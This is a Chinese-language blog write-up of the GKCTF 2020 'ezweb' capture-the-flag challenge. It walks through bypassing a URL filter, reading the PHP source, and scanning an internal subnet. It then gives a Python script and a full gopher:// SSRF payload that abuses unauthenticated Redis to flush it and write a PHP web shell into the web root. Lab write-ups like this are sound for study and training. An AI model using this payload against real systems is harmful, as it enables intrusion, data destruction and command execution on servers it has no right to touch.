[GKCTF 2020]ez三剑客-ezweb

最新推荐文章于 2023-10-14 23:35:06 发布
最新推荐文章于 2023-10-14 23:35:06 发布
阅读量279 收藏
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/130185744
版权

1.打开环境

是输入url的题目,基本可以判断是ssrf的题目,尝试用file伪协议读取index.php源码.

发现被过滤了,尝试file:/、file:<空格>///,成功获得index.php的源码。

<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}
if(isset($_GET['secret'])){
	system('ifconfig');
}
?>

查看页面源码,发现可以进行secret传参,获得内网信息。

 

用薄荷扫描内网c段寻找存活主机,发现提示

 盲猜redit默认端口6379和mysql默认端口3306,发现redit服务有回显

利用redis服务未授权访问漏洞在根目录创建shell.php

python脚本:

import urllib
protocol="gopher://"
ip="173.13.144.12"      // 运行有redis的主机ip
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(shell.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

payload:

gopher://172.2.10.24:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0%20A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%24%203%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0%20D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

访问/shell.php得到flag

相关文章:

gopher协议利用

SSRF利用协议中的万金油——Gopher

ha0cker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GKCTF2020]EZ剑客-EzWeb
qq_40327508的博客
11-27 514
考点 ssrf redis反弹shell 打开网站,查看源代码 查看文件 访问下ip 经过测试是ssrf漏洞 使用burp爆破内网ip
ezk-front:EZ Web前端存储库控制版本
03-31
"ezk-front:EZ Web前端存储库控制版本"是一个针对前端开发的项目,它主要用于管理和控制Web应用的版本。在Web开发中,前端部分通常包括HTML、CSS、JavaScript以及相关的库和框架,这些内容需要有效地组织和管理,以...
ctf php 流量分析题,GKCTF EZWEB的分析题解和思考
weixin_35674742的博客
03-09 464
GKCTF EZ剑客-EzWeb看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现:这就很敏感了,相当于一个ifconfig的命令,这个时候应该是SSRF打内网,看内网的存活主机有多少,直接burp抓个包爆破一下有新发现:这个IP的其他端口有问题?不多说,nmap一把梭看看有哪些常见=...
EZWebAlbum-开源
05-09
EZWebAlbum是一个开源的Web相册系统,设计用于在互联网上展示个人或集体的照片集。... 首先,从标题“EZWebAlbum-开源”我们可以得知,这是一个开放源代码的项目,意味着其源代码可供公众查看、使用、修改和分发。...
EzWeb:使用开源DXP的专业Web开发
03-17
易网使用开源DXP的专业Web开发使用过的Techno: 仓库:github 本地开发人员:docker撰写服务:DB,redis,mailcatcher CI:github动作网站:eZ平台和Ibexa API:GraphQL sh:Platform.sh如何开始在开始之前开始之前...
original-emoji:原始的日本表情符号图形和代码
05-24
原始的日本表情符号资源请注意,从2012年4月开始, 和基本上采用了表情符号设计,而保留了自己的设计,该... 它以前使用的标签是EZweb和TUKA。 他们的图形大部分来自提供移动WAP浏览器的Openwave 。 E-Mobile拥有一项称
[GKCTF2020]EZ剑客-EzWeb(SSRF)
qq_45521281的博客
06-03 4618
查看源码发现提示: 在url里访问一下: 得到一串ifconfig的结果,整理一下的: eth0 Link encap:Ethernet HWaddr 02:42:ad:62:04:0a inet addr:173.96.119.10 Bcast:173.98.4.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX pac.
GKCTF EZ剑客-EzWeb 题目分析总结
crispr的博客
06-30 2500
此篇文章在安全客首发,仅转载到个人博客 https://www.anquanke.com/post/id/209117 前言 刚考完考试自己在buu上复现的,之前没来得及做,复习去了,虽然还是考的很菜(我是fw 。记录一下学习过程吧 正言 GKCTF EZ剑客-EzWeb 看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。 嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现: 这就很敏感了,相当于一个 ifconfig 的命令,这个时.
[GKCTF2020]EZ剑客-EzNode
feng的博客
02-16 948
前言 之前buu上刷到这题的时候,感觉是个前端的题,就绕过没看了。今天在某平台做红包题遇到了基本上考点一样的题目,在学长的指引下又把这题给做了一下,总的来说还算比较友好,因为我不会前端我也大致能看懂这题是啥意思。 WP 进入环境是个计算器,看一下源代码: const express = require('express'); const bodyParser = require('body-parser'); const saferEval = require('safer-eval'); // 2019
kalmarCTF(WEB|EZ)WP
记录学习,一起进步
03-23 410
kalmarCTF(WEB|EZ)WP
[GDOUCTF 2023]EZ WEB 学习笔记
ZhangAweio的博客
04-26 677
其中 '/super-secret-route-nobody-will-guess' 路由返回的内容可能是敏感信息。看到题目没啥提示,说他保证flag就在附近。那我们只需要抓包、改包发送PUT请求就行了。发现了个提示的文件/src 我们打开它。我们F12查看源码看看有啥有用的东西。
GKCTF复现-web
qq_44657899的博客
03-17 522
文章目录[GKCTF2020]CheckIN[GKCTF2020]cve版签到[GKCTF2020]老八小超市儿(shopxo后台全版本拿shell)[GKCTF2020]EZ剑客-EzWeb(redis未授权访问)一,信息收集二,bp扫C段:三,扫端口四,利用脚本生成payload [GKCTF2020]CheckIN [GKCTF2020]cve版签到 [GKCTF2020]老八小超市儿(shopxo后台全版本拿shell) 渗透测试|shopxo后台全版本获取shell复现 跟着这篇文章一步步做就能
ACTF新生赛 EASYHTTP
SopRomeo的博客
03-17 906
最近自闭了,找了ACTF新生赛的源码自己复现做了一下 看到下面输出了服务器对应的信息,我们将这些信息依次填上去 让我们GET,POST,注意url地址: 地址换了,放burb去上传GET,POST.(传中文需进行url编码) 发现换了个php代码,复制到proxy放行, 重新抓包 伪造ip地址即可得到flag ...
[HNCTF 2022 WEEK2]ez_ssrf题目解析
最新发布
2201_75327657的博客
10-14 678
函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察。题目开始给了我们信息让我们去访问index.php。本题是需要我们去伪造一个ssrf的请求头去绕过。
CTF-安恒18年十二月月赛部分writeup
weixin_34255055的博客
12-22 713
CTF-安恒十二月月赛部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道。 WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了admin.php,但是提示:你不是管理员。好吧,抓个包看看 解一下码--: 将user改为admin,发现直接跳转到了admin.php页面。 这个框试了一下是可以执行命...
HECTF2023 Web挑战心得:身份验证与SSRF攻防
在HECTF2023的校内网络安全竞赛中,参赛者分享了解决两道web CTF题目——"伪装者"和"EZweb"的经历和方法。首先,我们来看看"伪装者"挑战。 1. 伪装者: - 题目涉及HTTP头信息的欺骗,如X-Forwarded-For、Referer和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值